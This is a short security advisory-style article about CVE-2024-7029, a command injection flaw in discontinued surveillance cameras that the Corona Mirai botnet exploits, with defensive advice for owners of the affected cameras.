Zero-Day Vulnerability in Surveillance Cameras

Research: LotusChain-Ai

Unpatchable Zero-Day Vulnerability in Surveillance Cameras: A Growing Threat

The cybersecurity landscape has been shaken by the discovery of a critical zero-day vulnerability, CVE-2024–7029, affecting certain models of surveillance cameras. This vulnerability has been exploited to install a variant of the notorious Mirai malware, known as Corona Mirai, which has been actively targeting these devices since March 2024. The implications of this vulnerability are significant, particularly given that the affected cameras have not received updates since their discontinuation in 2019.

Understanding CVE-2024–7029

CVE-2024–7029 is a command injection vulnerability that allows unauthenticated attackers to execute arbitrary commands remotely. The flaw lies within the camera’s firmware, specifically in how it processes requests related to device settings. Attackers can exploit this vulnerability by sending specially crafted requests that manipulate parameters, effectively gaining control over the device without needing any authentication.

Severity and Impact

The vulnerability has been assigned a CVSS score of 8.7, indicating high severity due to its low attack complexity and the availability of public exploits. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued advisories warning that these cameras are still in use across various critical sectors, including healthcare, transportation, and commercial facilities.

Despite proof-of-concept (PoC) exploits being available since at least 2019, formal recognition through CVE assignment only occurred in August 2024. This delay may have contributed to the vulnerability being overlooked until it was actively exploited in the wild.

Exploitation Trends

The first recorded exploitation of CVE-2024–7029 began on March 18, 2024, although evidence suggests that preparatory activities may have started as early as December 2023. The malware deployed through this vulnerability connects to command and control (C2) servers to await further instructions for executing Distributed Denial of Service (DDoS) attacks.

Targeted Systems

The specific models affected include various surveillance cameras that utilize similar firmware architectures. Given that these devices have reached their end-of-life status, no patches or updates are expected from manufacturers, leaving users vulnerable to ongoing exploitation.

Recommendations for Users

For users of affected surveillance cameras, immediate action is crucial:

• Replace Devices: Given that many of these cameras are no longer supported, replacing them with newer models that receive regular security updates is strongly recommended.
• Network Isolation: Minimize network exposure by ensuring that vulnerable devices are not accessible from the internet. Implement firewalls and isolate these devices from critical business networks.
• Change Default Credentials: Ensure that default passwords are changed to strong, unique passwords to reduce the risk of unauthorized access.

In Result

The emergence of CVE-2024–7029 highlights a growing trend where legacy devices with unpatched vulnerabilities become prime targets for cyber-criminals. As demonstrated by the Corona Mirai botnet’s exploitation of this flaw, organizations must remain vigilant about device security and prioritize timely updates or replacements for outdated technology. The ongoing evolution of threats in this domain reinforces the necessity for proactive cybersecurity measures to safeguard critical infrastructure and sensitive data.